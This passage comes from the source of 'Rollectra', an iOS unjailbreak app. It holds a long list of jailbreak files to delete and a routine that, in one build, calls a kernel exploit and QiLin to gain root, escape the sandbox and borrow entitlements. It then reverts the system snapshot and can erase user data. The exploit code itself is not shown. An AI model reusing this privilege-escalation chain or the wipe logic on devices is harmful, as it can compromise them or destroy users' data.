addObject:@"/usr/bin/ssh-agent"]; 423 | [array addObject:@"/usr/bin/ssh-keygen"]; 424 | [array addObject:@"/usr/bin/ssh-keyscan"]; 425 | [array addObject:@"/usr/bin/sw_vers"]; 426 | [array addObject:@"/usr/bin/tabs"]; 427 | [array addObject:@"/usr/bin/tar"]; 428 | [array 
addObject:@"/usr/bin/tic"]; 429 | [array addObject:@"/usr/bin/time"]; 430 | [array addObject:@"/usr/bin/toe"]; 431 | [array addObject:@"/usr/bin/tput"]; 432 | [array addObject:@"/usr/bin/tset"]; 433 | [array addObject:@"/usr/bin/uicache"]; 434 | [array addObject:@"/usr/bin/uiduid"]; 435 | [array addObject:@"/usr/bin/uiopen"]; 436 | [array addObject:@"/usr/bin/unlzma"]; 437 | [array addObject:@"/usr/bin/unxz"]; 438 | [array addObject:@"/usr/bin/update-alternatives"]; 439 | [array addObject:@"/usr/bin/updatedb"]; 440 | [array addObject:@"/usr/bin/which"]; 441 | [array addObject:@"/usr/bin/xargs"]; 442 | [array addObject:@"/usr/bin/xz"]; 443 | [array addObject:@"/usr/bin/xzcat"]; 444 | [array addObject:@"/usr/bin/xzcmp"]; 445 | [array addObject:@"/usr/bin/xzdec"]; 446 | [array addObject:@"/usr/bin/xzdiff"]; 447 | [array addObject:@"/usr/bin/xzegrep"]; 448 | [array addObject:@"/usr/bin/xzfgrep"]; 449 | [array addObject:@"/usr/bin/xzgrep"]; 450 | [array addObject:@"/usr/bin/xzless"]; 451 | [array addObject:@"/usr/bin/xzmore"]; 452 | [array addObject:@"/usr/games"]; 453 | [array addObject:@"/usr/include/curses.h"]; 454 | [array addObject:@"/usr/include/db_cxx.h"]; 455 | [array addObject:@"/usr/include/db.h"]; 456 | [array addObject:@"/usr/include/dbsql.h"]; 457 | [array addObject:@"/usr/include/dpkg"]; 458 | [array addObject:@"/usr/include/eti.h"]; 459 | [array addObject:@"/usr/include/form.h"]; 460 | [array addObject:@"/usr/include/lzma"]; 461 | [array addObject:@"/usr/include/lzma.h"]; 462 | [array addObject:@"/usr/include/menu.h"]; 463 | [array addObject:@"/usr/include/nc_tparm.h"]; 464 | [array addObject:@"/usr/include/ncurses_dll.h"]; 465 | [array addObject:@"/usr/include/ncurses.h"]; 466 | [array addObject:@"/usr/include/ncursesw"]; 467 | [array addObject:@"/usr/include/openssl"]; 468 | [array addObject:@"/usr/include/panel.h"]; 469 | [array addObject:@"/usr/include/term_entry.h"]; 470 | [array addObject:@"/usr/include/term.h"]; 471 | [array 
addObject:@"/usr/include/termcap.h"]; 472 | [array addObject:@"/usr/include/tic.h"]; 473 | [array addObject:@"/usr/include/unctrl.h"]; 474 | [array addObject:@"/usr/lib/apt"]; 475 | [array addObject:@"/usr/lib/bash"]; 476 | [array addObject:@"/usr/lib/engines"]; 477 | [array addObject:@"/usr/lib/libapt-inst.2.0.0.dylib"]; 478 | [array addObject:@"/usr/lib/libapt-inst.2.0.dylib"]; 479 | [array addObject:@"/usr/lib/libapt-inst.dylib"]; 480 | [array addObject:@"/usr/lib/libapt-pkg.5.0.1.dylib"]; 481 | [array addObject:@"/usr/lib/libapt-pkg.5.0.dylib"]; 482 | [array addObject:@"/usr/lib/libapt-pkg.dylib"]; 483 | [array addObject:@"/usr/lib/libapt-private.0.0.0.dylib"]; 484 | [array addObject:@"/usr/lib/libapt-private.0.0.dylib"]; 485 | [array addObject:@"/usr/lib/libcrypto.1.0.0.dylib"]; 486 | [array addObject:@"/usr/lib/libcrypto.a"]; 487 | [array addObject:@"/usr/lib/libcrypto.dylib"]; 488 | [array addObject:@"/usr/lib/libdb_sql-6.2.dylib"]; 489 | [array addObject:@"/usr/lib/libdb_sql-6.dylib"]; 490 | [array addObject:@"/usr/lib/libdb_sql.dylib"]; 491 | [array addObject:@"/usr/lib/libdb-6.2.dylib"]; 492 | [array addObject:@"/usr/lib/libdb-6.dylib"]; 493 | [array addObject:@"/usr/lib/libdb.dylib"]; 494 | [array addObject:@"/usr/lib/libdpkg.a"]; 495 | [array addObject:@"/usr/lib/libdpkg.la"]; 496 | [array addObject:@"/usr/lib/liblzma.a"]; 497 | [array addObject:@"/usr/lib/liblzma.la"]; 498 | [array addObject:@"/usr/lib/libssl.1.0.0.dylib"]; 499 | [array addObject:@"/usr/lib/libssl.a"]; 500 | [array addObject:@"/usr/lib/libssl.dylib"]; 501 | [array addObject:@"/usr/lib/pkgconfig"]; 502 | [array addObject:@"/usr/lib/ssl"]; 503 | [array addObject:@"/usr/lib/terminfo"]; 504 | [array addObject:@"/usr/libexec/apt"]; 505 | [array addObject:@"/usr/libexec/bigram"]; 506 | [array addObject:@"/usr/libexec/code"]; 507 | [array addObject:@"/usr/libexec/cydia"]; 508 | [array addObject:@"/usr/libexec/dpkg"]; 509 | [array addObject:@"/usr/libexec/frcode"]; 510 | [array 
addObject:@"/usr/libexec/gnupg"]; 511 | [array addObject:@"/usr/libexec/rmt"]; 512 | [array addObject:@"/usr/libexec/sftp-server"]; 513 | [array addObject:@"/usr/libexec/ssh-keysign"]; 514 | [array addObject:@"/usr/libexec/ssh-pkcs11-helper"]; 515 | [array addObject:@"/usr/local/lib"]; 516 | [array addObject:@"/usr/sbin/ac"]; 517 | [array addObject:@"/usr/sbin/accton"]; 518 | [array addObject:@"/usr/sbin/halt"]; 519 | [array addObject:@"/usr/sbin/iostat"]; 520 | [array addObject:@"/usr/sbin/mkfile"]; 521 | [array addObject:@"/usr/sbin/pwd_mkdb"]; 522 | [array addObject:@"/usr/sbin/reboot"]; 523 | [array addObject:@"/usr/sbin/sshd"]; 524 | [array addObject:@"/usr/sbin/startupfiletool"]; 525 | [array addObject:@"/usr/sbin/sysctl"]; 526 | [array addObject:@"/usr/sbin/vifs"]; 527 | [array addObject:@"/usr/sbin/vipw"]; 528 | [array addObject:@"/usr/sbin/zdump"]; 529 | [array addObject:@"/usr/sbin/zic"]; 530 | [array addObject:@"/usr/share/bigboss"]; 531 | [array addObject:@"/usr/share/dict"]; 532 | [array addObject:@"/usr/share/dpkg"]; 533 | [array addObject:@"/usr/share/gnupg"]; 534 | [array addObject:@"/usr/share/tabset"]; 535 | [array addObject:@"/usr/share/terminfo"]; 536 | // Potential Manual Files 537 | [array addObject:@"/bin/bash"]; 538 | [array addObject:@"/authorize.sh"]; 539 | [array addObject:@"/Applications/jjjj.app"]; 540 | [array addObject:@"/Applications/Extender.app"]; 541 | [array addObject:@"/Applications/GBA4iOS.app"]; 542 | [array addObject:@"/Applications/Filza.app"]; 543 | [array addObject:@"/Library/dpkg"]; 544 | [array addObject:@"/Library/Cylinder"]; 545 | [array addObject:@"/Library/LaunchDaemons"]; 546 | [array addObject:@"/Library/Zeppelin"]; 547 | [array addObject:@"/etc/alternatives"]; 548 | [array addObject:@"/etc/apt"]; 549 | [array addObject:@"/etc/dpkg"]; 550 | [array addObject:@"/etc/dropbear"]; 551 | [array addObject:@"/etc/pam.d"]; 552 | [array addObject:@"/etc/profile.d"]; 553 | [array addObject:@"/etc/ssh"]; 554 | [array 
addObject:@"/usr/include"]; 555 | [array addObject:@"/usr/lib/apt"]; 556 | [array addObject:@"/usr/lib/dpkg"]; 557 | [array addObject:@"/usr/lib/pam"]; 558 | [array addObject:@"/usr/lib/pkgconfig"]; 559 | [array addObject:@"/usr/lib/cycript0.9"]; 560 | [array addObject:@"/usr/libexec/cydia"]; 561 | [array addObject:@"/usr/libexec/gnupg"]; 562 | [array addObject:@"/usr/share/bigboss"]; 563 | [array addObject:@"/usr/share/dpkg"]; 564 | [array addObject:@"/usr/share/gnupg"]; 565 | [array addObject:@"/usr/share/tabset"]; 566 | [array addObject:@"/private/var/cache/apt"]; 567 | [array addObject:@"/private/var/db/stash"]; 568 | [array addObject:@"/private/var/lib/apt"]; 569 | [array addObject:@"/private/var/lib/dpkg"]; 570 | [array addObject:@"/private/var/stash"]; 571 | [array addObject:@"/private/var/tweak"]; 572 | // Electra Beta Bootstrap 573 | [array addObject:@"/Applications/Anemone.app"]; 574 | [array addObject:@"/Applications/SafeMode.app"]; 575 | [array addObject:@"/usr/lib/SBInject.dylib"]; 576 | [array addObject:@"/usr/lib/SBInject"]; 577 | [array addObject:@"/usr/lib/libsubstitute.0.dylib"]; 578 | [array addObject:@"/usr/lib/libsubstitute.dylib"]; 579 | [array addObject:@"/usr/lib/libsubstrate.dylib"]; 580 | [array addObject:@"/usr/lib/libjailbreak.dylib"]; 581 | [array addObject:@"/usr/bin/recache"]; 582 | [array addObject:@"/usr/bin/killall"]; 583 | [array addObject:@"/usr/share/terminfo"]; 584 | [array addObject:@"/usr/libexec/sftp-server"]; 585 | [array addObject:@"/usr/lib/SBInject.dylib"]; 586 | [array addObject:@"/Library/Frameworks"]; 587 | [array addObject:@"/System/Library/Themes"]; 588 | [array addObject:@"/bootstrap"]; 589 | [array addObject:@"/Library/Themes"]; 590 | [array addObject:@"/usr/lib/SBInject.dylib"]; 591 | [array addObject:@"/Library/MobileSubstrate"]; 592 | // Filza 593 | [array addObject:@"/Applications/Filza.app"]; 594 | [array addObject:@"/private/var/root/Library/Filza"]; 595 | [array 
addObject:@"/private/var/root/Library/Preferences/com.tigisoftware.Filza.plist"]; 596 | [array addObject:@"/private/var/root/Library/Caches/com.tigisoftware.Filza"]; 597 | [array addObject:@"/private/var/mobile/Library/Filza/"]; 598 | [array addObject:@"/private/var/mobile/Library/Filza/.Trash"]; 599 | [array addObject:@"/private/var/mobile/Library/Filza/.Trash.metadata"]; 600 | [array addObject:@"/private/var/mobile/Library/Preferences/com.tigisoftware.Filza.plist"]; 601 | // Liberios 602 | [array addObject:@"/etc/motd"]; 603 | [array addObject:@"/.cydia_no_stash"]; 604 | [array addObject:@"/Applications/Cydia.app"]; 605 | [array addObject:@"/usr/share/terminfo"]; 606 | [array addObject:@"/usr/local/bin"]; 607 | [array addObject:@"/usr/local/lib"]; 608 | [array addObject:@"/bin/zsh"]; 609 | [array addObject:@"/etc/profile"]; 610 | [array addObject:@"/etc/zshrc"]; 611 | [array addObject:@"/usr/bin/scp"]; 612 | [array addObject:@"/jb"]; 613 | // ToPanga 614 | [array addObject:@"/etc/alternatives"]; 615 | [array addObject:@"/etc/dpkg"]; 616 | [array addObject:@"/etc/dropbear"]; 617 | [array addObject:@"/etc/profile"]; 618 | [array addObject:@"/etc/zshrc"]; 619 | [array addObject:@"/usr/bin/apt"]; 620 | [array addObject:@"/usr/bin/apt-get"]; 621 | [array addObject:@"/usr/bin/cycc"]; 622 | [array addObject:@"/usr/bin/cycript"]; 623 | [array addObject:@"/usr/bin/cynject"]; 624 | [array addObject:@"/usr/bin/dpkg"]; 625 | [array addObject:@"/usr/bin/dpkg-deb"]; 626 | [array addObject:@"/usr/bin/dpkg-divert"]; 627 | [array addObject:@"/usr/bin/dpkg-maintscript-helper"]; 628 | [array addObject:@"/usr/bin/dpkg-query"]; 629 | [array addObject:@"/usr/bin/dpkg-split"]; 630 | [array addObject:@"/usr/bin/dpkg-statoverride"]; 631 | [array addObject:@"/usr/bin/dpkg-trigger"]; 632 | [array addObject:@"/usr/bin/dselect"]; 633 | [array addObject:@"/usr/bin/env"]; 634 | [array addObject:@"/usr/bin/gnutar"]; 635 | [array addObject:@"/usr/bin/gtar"]; 636 | [array 
addObject:@"/usr/bin/uicache"]; 637 | [array addObject:@"/usr/bin/update-alternatives"]; 638 | [array addObject:@"/usr/include/dpkg"]; 639 | [array addObject:@"/usr/include/substrate.h"]; 640 | [array addObject:@"/usr/lib/apt"]; 641 | [array addObject:@"/usr/lib/cycript0.9"]; 642 | [array addObject:@"/usr/lib/dpkg"]; 643 | [array addObject:@"/usr/lib/libapt-inst.dylib"]; 644 | [array addObject:@"/usr/lib/libapt-pkg.dylib"]; 645 | [array addObject:@"/usr/lib/libcrypto.1.0.0.dylib"]; 646 | [array addObject:@"/usr/lib/libcurl.4.dylib"]; 647 | [array addObject:@"/usr/lib/libcycript.0.dylib"]; 648 | [array addObject:@"/usr/lib/libcycript.cy"]; 649 | [array addObject:@"/usr/lib/libcycript.db"]; 650 | [array addObject:@"/usr/lib/libcycript.dylib"]; 651 | [array addObject:@"/usr/lib/libcycript.jar"]; 652 | [array addObject:@"/usr/lib/libdpkg.a"]; 653 | [array addObject:@"/usr/lib/libdpkg.la"]; 654 | [array addObject:@"/usr/lib/libssl.1.0.0.dylib"]; 655 | [array addObject:@"/usr/lib/libsubstrate.0.dylib"]; 656 | [array addObject:@"/usr/lib/libsubstrate.dylib"]; 657 | [array addObject:@"/usr/lib/pkgconfig"]; 658 | [array addObject:@"/usr/share/dpkg"]; 659 | [array addObject:@"/usr/local/bin"]; 660 | [array addObject:@"/usr/local/lib"]; 661 | [array addObject:@"/usr/libexec/cydia"]; 662 | [array addObject:@"/usr/libexec/MSUnrestrictProcess"]; 663 | [array addObject:@"/usr/libexec/substrate"]; 664 | [array addObject:@"/usr/sbin/start-stop-daemon"]; 665 | [array addObject:@"/private/var/lib"]; 666 | [array addObject:@"/bin/bash"]; 667 | [array addObject:@"/bin/bzip2"]; 668 | [array addObject:@"/bin/bzip2_64"]; 669 | [array addObject:@"/bin/cat"]; 670 | [array addObject:@"/bin/chmod"]; 671 | [array addObject:@"/bin/chown"]; 672 | [array addObject:@"/bin/cp"]; 673 | [array addObject:@"/bin/date"]; 674 | [array addObject:@"/bin/dd"]; 675 | [array addObject:@"/bin/hostname"]; 676 | [array addObject:@"/bin/kill"]; 677 | [array addObject:@"/bin/launchctl"]; 678 | [array 
addObject:@"/bin/ln"]; 679 | [array addObject:@"/bin/ls"]; 680 | [array addObject:@"/bin/mkdir"]; 681 | [array addObject:@"/bin/mv"]; 682 | [array addObject:@"/bin/pwd"]; 683 | [array addObject:@"/bin/rm"]; 684 | [array addObject:@"/bin/rmdir"]; 685 | [array addObject:@"/bin/sed"]; 686 | [array addObject:@"/bin/sh"]; 687 | [array addObject:@"/bin/sleep"]; 688 | [array addObject:@"/bin/stty"]; 689 | [array addObject:@"/bin/zsh"]; 690 | [array addObject:@"/Applications/Cydia.app"]; 691 | [array addObject:@"/Library/Frameworks"]; 692 | [array addObject:@"/Library/MobileSubstrate"]; 693 | [array addObject:@"/Library/test_inject_springboard.cy"]; 694 | return array; 695 | } 696 | 697 | #ifdef WANT_CYDIA 698 | void unjailbreak(int shouldEraseUserData) 699 | #else /* !WANT_CYDIA */ 700 | void unjailbreak(mach_port_t tfp0, uint64_t kernel_base, int shouldEraseUserData) 701 | #endif /* !WANT_CYDIA */ 702 | { 703 | // Initialize variables. 704 | int rv = 0; 705 | #ifndef WANT_CYDIA 706 | uint64_t myOriginalCredAddr = 0; 707 | #endif /* WANT_CYDIA */ 708 | NSMutableDictionary *md = nil; 709 | NSArray *cleanUpFileList = nil; 710 | 711 | #ifndef WANT_CYDIA 712 | // Initialize QiLin. 713 | LOG("%@", NSLocalizedString(@"Initializing QiLin...", nil)); 714 | rv = initQiLin(tfp0, kernel_base); 715 | LOG("rv: " "%d" "\n", rv); 716 | _assert(rv == 0); 717 | LOG("%@", NSLocalizedString(@"Successfully initialized QiLin.", nil)); 718 | #endif /* WANT_CYDIA */ 719 | 720 | #ifndef WANT_CYDIA 721 | // Rootify myself. 722 | LOG("%@", NSLocalizedString(@"Rootifying myself...", nil)); 723 | rv = rootifyMe(); 724 | LOG("rv: " "%d" "\n", rv); 725 | _assert(rv == 0); 726 | LOG("%@", NSLocalizedString(@"Successfully rootified myself.", nil)); 727 | #endif /* WANT_CYDIA */ 728 | 729 | #ifndef WANT_CYDIA 730 | // Escape Sandbox. 
731 | LOG("%@", NSLocalizedString(@"Escaping Sandbox...", nil)); 732 | myOriginalCredAddr = ShaiHuludMe(0); 733 | LOG("myOriginalCredAddr: " ADDR "\n", myOriginalCredAddr); 734 | LOG("%@", NSLocalizedString(@"Successfully escaped Sandbox.", nil)); 735 | #endif /* WANT_CYDIA */ 736 | 737 | #ifndef WANT_CYDIA 738 | // Write a test file. 739 | 740 | LOG("%@", NSLocalizedString(@"Writing a test file...", nil)); 741 | if (!access("/var/mobile/test.txt", F_OK)) { 742 | rv = unlink("/var/mobile/test.txt"); 743 | LOG("rv: " "%d" "\n", rv); 744 | _assert(rv == 0); 745 | } 746 | rv = fclose(fopen("/var/mobile/test.txt", "w+")); 747 | LOG("rv: " "%d" "\n", rv); 748 | _assert(rv == 0); 749 | rv = unlink("/var/mobile/test.txt"); 750 | LOG("rv: " "%d" "\n", rv); 751 | _assert(rv == 0); 752 | LOG("%@", NSLocalizedString(@"Successfully wrote a test file.", nil)); 753 | #endif /* WANT_CYDIA */ 754 | 755 | #ifndef WANT_CYDIA 756 | // Borrow entitlements from fsck_apfs. 757 | 758 | LOG("%@", NSLocalizedString(@"Borrowing entitlements from fsck_apfs...", nil)); 759 | borrowEntitlementsFromDonor("/sbin/fsck_apfs", NULL); 760 | LOG("%@", NSLocalizedString(@"Successfully borrowed entitlements from fsck_apfs.", nil)); 761 | 762 | // We now have fs_snapshot_rename. 763 | #endif /* WANT_CYDIA */ 764 | 765 | // Revert to the system snapshot. 
766 | LOG("%@", NSLocalizedString(@"Reverting to the system snapshot...", nil)); 767 | rv = fs_snapshot_rename(open("/", O_RDONLY, 0), "orig-fs", systemSnapshot(copyBootHash()), 0); 768 | LOG("rv: " "%d" "\n", rv); 769 | _assert(rv == 0); 770 | LOG("%@", NSLocalizedString(@"Successfully put the system snapshot in place, it should revert on the next mount.", nil)); 771 | 772 | md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 773 | _assert(md); 774 | md[@"SBShowNonDefaultSystemApps"] = @(NO); 775 | [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 776 | 777 | // Revert to the system snapshot. 778 | LOG("%@", NSLocalizedString(@"Reverting to the system snapshot...", nil)); 779 | extern int SBDataReset(mach_port_t, int); 780 | extern mach_port_t SBSSpringBoardServerPort(void); 781 | mach_port_t SpringBoardServerPort = SBSSpringBoardServerPort(); 782 | _assert(MACH_PORT_VALID(SpringBoardServerPort)); 783 | #ifdef WANT_CYDIA 784 | if (kCFCoreFoundationVersionNumber < 1452.23) { 785 | if (access("/var/MobileSoftwareUpdate/mnt1", F_OK)) { 786 | rv = mkdir("/var/MobileSoftwareUpdate/mnt1", 0755); 787 | LOG("rv: " "%d" "\n", rv); 788 | _assert(rv == 0); 789 | } 790 | if (snapshot_check("/", "electra-prejailbreak") == 1) { 791 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", @"electra-prejailbreak", @"/", @"/var/MobileSoftwareUpdate/mnt1"]); 792 | } else if (snapshot_check("/", "orig-fs") == 1) { 793 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", @"orig-fs", @"/", @"/var/MobileSoftwareUpdate/mnt1"]); 794 | } else { 795 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/sbin/mount_apfs"], @[@"-s", [NSString stringWithFormat:@"%s", systemSnapshot(copyBootHash())], @"/", @"/var/MobileSoftwareUpdate/mnt1"]); 796 | } 797 | LOG("rv: " "%d" "\n", rv); 798 | _assert(rv == 0); 799 | rv = 
waitForFile("/var/MobileSoftwareUpdate/mnt1/sbin/launchd"); 800 | LOG("rv: " "%d" "\n", rv); 801 | _assert(rv == 0); 802 | rv = easyPosixSpawn([NSURL fileURLWithPath:@"/usr/bin/rsync"], @[@"-vaxcH", @"--progress", @"--delete-after", @"/var/MobileSoftwareUpdate/mnt1/.", @"/"]); 803 | LOG("rv: " "%d" "\n", rv); 804 | _assert(rv == 0); 805 | } 806 | else { 807 | #endif /* !WANT_CYDIA */ 808 | #ifdef WANT_CYDIA 809 | rv = fs_snapshot_rename(open("/", O_RDONLY, 0), "orig-fs", systemSnapshot(copyBootHash()), 0); 810 | LOG("rv: " "%d" "\n", rv); 811 | _assert(rv == 0); 812 | } 813 | #endif /* !WANT_CYDIA */ 814 | LOG("%@", NSLocalizedString(@"Successfully put the system snapshot in place, it should revert on the next mount.", nil)); 815 | 816 | // Clean up. 817 | 818 | LOG("%@", NSLocalizedString(@"Cleaning up...", nil)); 819 | cleanUpFileList = getCleanUpFileList(); 820 | _assert(cleanUpFileList != nil); 821 | for (NSString *fileName in cleanUpFileList) { 822 | if (!access([fileName UTF8String], F_OK)) { 823 | _assert([[NSFileManager defaultManager] removeItemAtPath:fileName error:nil] == 1); 824 | } 825 | } 826 | LOG("%@", NSLocalizedString(@"Successfully cleaned up.", nil)); 827 | 828 | #ifndef WANT_CYDIA 829 | // Entitle myself. 830 | LOG("%@", NSLocalizedString(@"Entitling myself...", nil)); 831 | rv = entitleMe("\tplatform-application\n" 832 | "\t\n" 833 | "\tcom.apple.springboard.wipedevice\n" 834 | "\t"); 835 | LOG("rv: " "%d" "\n", rv); 836 | _assert(rv == 0); 837 | LOG("%@", NSLocalizedString(@"Successfully entitled myself.", nil)); 838 | #endif /* WANT_CYDIA */ 839 | 840 | // Erase user data. 841 | LOG("%@", NSLocalizedString(@"Erasing user data...", nil)); 842 | rv = SBDataReset(SpringBoardServerPort, shouldEraseUserData ? 
5 : 1); 843 | LOG("rv: " "%d" "\n", rv); 844 | _assert(rv == 0); 845 | rv = reboot(0x400); 846 | LOG("rv: " "%d" "\n", rv); 847 | _assert(rv == 0); 848 | LOG("%@", NSLocalizedString(@"Successfully erased user data.", nil)); 849 | } 850 | 851 | - (IBAction)tappedOnUnjailbreak:(id)sender { 852 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{ 853 | UIAlertController *alertController = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Confirmation", nil) message:NSLocalizedString(@"Are you sure want to erase all data and unjailbreak the device?", nil) preferredStyle:UIAlertControllerStyleAlert]; 854 | UIAlertAction *OK = [UIAlertAction actionWithTitle:NSLocalizedString(@"Erase All", nil) style:UIAlertActionStyleDestructive handler:^(UIAlertAction * _Nonnull action) { 855 | dispatch_async(dispatch_get_main_queue(), ^{ 856 | [self.unjailbreakButton setEnabled:NO]; 857 | }); 858 | dispatch_async(dispatch_get_main_queue(), ^{ 859 | [self.unjailbreakButton setAlpha:0.5]; 860 | }); 861 | dispatch_async(dispatch_get_main_queue(), ^{ 862 | [self.resetUserDataSwitch setEnabled:NO]; 863 | }); 864 | #ifndef WANT_CYDIA 865 | dispatch_async(dispatch_get_main_queue(), ^{ 866 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Exploiting...", nil) forState:UIControlStateDisabled]; 867 | }); 868 | #endif /* WANT_CYDIA */ 869 | #ifndef WANT_CYDIA 870 | // Initialize kernel exploit. 871 | LOG("%@", NSLocalizedString(@"Initializing kernel exploit...", nil)); 872 | vfs_sploit(); 873 | #endif /* WANT_CYDIA */ 874 | #ifndef WANT_CYDIA 875 | // Validate TFP0. 
876 | LOG("%@", NSLocalizedString(@"Validating TFP0...", nil)); 877 | _assert(MACH_PORT_VALID(tfp0)); 878 | LOG("%@", NSLocalizedString(@"Successfully validated TFP0.", nil)); 879 | #endif /* WANT_CYDIA */ 880 | dispatch_async(dispatch_get_main_queue(), ^{ 881 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Unjailbreaking...", nil) forState:UIControlStateDisabled]; 882 | }); 883 | dispatch_async(dispatch_get_main_queue(), ^{ 884 | #ifdef WANT_CYDIA 885 | unjailbreak(self.resetUserDataSwitch.isOn); 886 | #else /* !WANT_CYDIA */ 887 | unjailbreak(tfp0, (uint64_t)get_kernel_base(tfp0), self.resetUserDataSwitch.isOn); 888 | #endif /* !WANT_CYDIA */ 889 | }); 890 | dispatch_async(dispatch_get_main_queue(), ^{ 891 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Failed, reboot.", nil) forState:UIControlStateDisabled]; 892 | }); 893 | }]; 894 | UIAlertAction *Cancel = [UIAlertAction actionWithTitle:NSLocalizedString(@"Cancel", nil) style:UIAlertActionStyleDefault handler:nil]; 895 | [alertController addAction:OK]; 896 | [alertController addAction:Cancel]; 897 | [alertController setPreferredAction:Cancel]; 898 | [self presentViewController:alertController animated:YES completion:nil]; 899 | }); 900 | } 901 | 902 | + (NSURL *)getURLForUserName:(NSString *)userName { 903 | if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetbot://"]]) { 904 | return [NSURL URLWithString:[NSString stringWithFormat:@"tweetbot:///user_profile/%@", userName]]; 905 | } else if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"twitterrific://"]]) { 906 | return [NSURL URLWithString:[NSString stringWithFormat:@"twitterrific:///profile?screen_name=%@", userName]]; 907 | } else if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetings://"]]) { 908 | return [NSURL URLWithString:[NSString stringWithFormat:@"tweetings:///user?screen_name=%@", userName]]; 909 | } else if ([[UIApplication sharedApplication] 
canOpenURL:[NSURL URLWithString:@"twitter://"]]) { 910 | return [NSURL URLWithString:[NSString stringWithFormat:@"https://mobile.twitter.com/%@", userName]]; 911 | } else { 912 | return [NSURL URLWithString:[NSString stringWithFormat:@"https://mobile.twitter.com/%@", userName]]; 913 | } 914 | } 915 | 916 | - (IBAction)tappedOnMe:(id)sender { 917 | [[UIApplication sharedApplication] openURL:[ViewController getURLForUserName:@"Pwn20wnd"] options:@{} completionHandler:nil]; 918 | } 919 | 920 | - (IBAction)tappedOnAesign_:(id)sender { 921 | [[UIApplication sharedApplication] openURL:[ViewController getURLForUserName:@"aesign_"] options:@{} completionHandler:nil]; 922 | } 923 | 924 | - (void)viewDidLoad { 925 | [super viewDidLoad]; 926 | // Do any additional setup after loading the view, typically from a nib. 927 | NSMutableAttributedString *str = [[NSMutableAttributedString alloc] initWithString:@"Revert all changes,\nfor a stock iOS."]; 928 | [str addAttribute:NSFontAttributeName value:[UIFont systemFontOfSize:19 weight:UIFontWeightBold] range:[@"Revert all changes,\nfor a stock iOS." rangeOfString:@"Revert "]]; 929 | [str addAttribute:NSFontAttributeName value:[UIFont systemFontOfSize:19 weight:UIFontWeightMedium] range:[@"Revert all changes,\nfor a stock iOS." rangeOfString:@"all changes,\nfor a stock "]]; 930 | [str addAttribute:NSFontAttributeName value:[UIFont systemFontOfSize:19 weight:UIFontWeightBold] range:[@"Revert all changes,\nfor a stock iOS." 
rangeOfString:@"iOS."]]; 931 | [self.infoLabel setAttributedText:str]; 932 | [self.unjailbreakButton addTarget:self action:@selector(tappedOnUnjailbreak:) forControlEvents:UIControlEventTouchUpInside]; 933 | [self.myButton addTarget:self action:@selector(tappedOnMe:) forControlEvents:UIControlEventTouchUpInside]; 934 | [self.aesign_Button addTarget:self action:@selector(tappedOnAesign_:) forControlEvents:UIControlEventTouchUpInside]; 935 | #ifndef WANT_CYDIA 936 | [self.QiLinLabel setHidden:NO]; 937 | #endif /* WANT_CYDIA */ 938 | #ifdef WANT_CYDIA 939 | if (kCFCoreFoundationVersionNumber < 1443.00) { 940 | #else /* !WANT_CYDIA */ 941 | if (kCFCoreFoundationVersionNumber <= 1451.51) { 942 | #endif /* !WANT_CYDIA */ 943 | dispatch_async(dispatch_get_main_queue(), ^{ 944 | [self.unjailbreakButton setEnabled:NO]; 945 | [self.unjailbreakButton setTitle:NSLocalizedString(@"Incompatible version", nil) forState:UIControlStateDisabled]; 946 | [self.unjailbreakButton setAlpha:0.5]; 947 | [self.resetUserDataSwitch setEnabled:NO]; 948 | }); 949 | } 950 | } 951 | 952 | - (void)didReceiveMemoryWarning { 953 | [super didReceiveMemoryWarning]; 954 | // Dispose of any resources that can be recreated. 955 | } 956 | 957 | - (UIStatusBarStyle)preferredStatusBarStyle { 958 | return UIStatusBarStyleLightContent; 959 | } 960 | 961 | @end 962 | -------------------------------------------------------------------------------- /Rollectra/common.h: -------------------------------------------------------------------------------- 1 | #ifndef COMMON_H 2 | #define COMMON_H 3 | 4 | #include // uint*_t 5 | #include 6 | 7 | #define LOG(str, args...) 
do { NSLog(@"[*] " str "\n", ##args); } while(0) 8 | #ifdef __LP64__ 9 | # define ADDR "0x%016llx" 10 | # define MACH_HEADER_MAGIC MH_MAGIC_64 11 | # define MACH_LC_SEGMENT LC_SEGMENT_64 12 | typedef struct mach_header_64 mach_hdr_t; 13 | typedef struct segment_command_64 mach_seg_t; 14 | typedef uint64_t kptr_t; 15 | #else 16 | # define ADDR "0x%08x" 17 | # define MACH_HEADER_MAGIC MH_MAGIC 18 | # define MACH_LC_SEGMENT LC_SEGMENT 19 | typedef struct mach_header mach_hdr_t; 20 | typedef struct segment_command mach_seg_t; 21 | typedef uint32_t kptr_t; 22 | #endif 23 | typedef struct load_command mach_lc_t; 24 | 25 | #define _assert(test) do \ 26 | if (!(test)) { \ 27 | fprintf(stderr, "_assert(%d:%s)@%s:%u[%s]\n", errno, #test, __FILE__, __LINE__, __FUNCTION__); \ 28 | exit(-1); \ 29 | } \ 30 | while (false) 31 | 32 | #endif 33 | -------------------------------------------------------------------------------- /Rollectra/iokit.h: -------------------------------------------------------------------------------- 1 | #ifndef IOKIT_H 2 | #define IOKIT_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | typedef char io_name_t[128]; 9 | typedef char io_string_t[512]; 10 | typedef char io_struct_inband_t[4096]; 11 | typedef mach_port_t io_object_t; 12 | typedef io_object_t io_registry_entry_t; 13 | typedef io_object_t io_service_t; 14 | typedef io_object_t io_connect_t; 15 | typedef io_object_t io_iterator_t; 16 | 17 | #define IO_OBJECT_NULL (0) 18 | 19 | enum 20 | { 21 | kIOCFSerializeToBinary = 0x00000001U, 22 | }; 23 | 24 | enum 25 | { 26 | kIORegistryIterateRecursively = 0x00000001U, 27 | kIORegistryIterateParents = 0x00000002U, 28 | 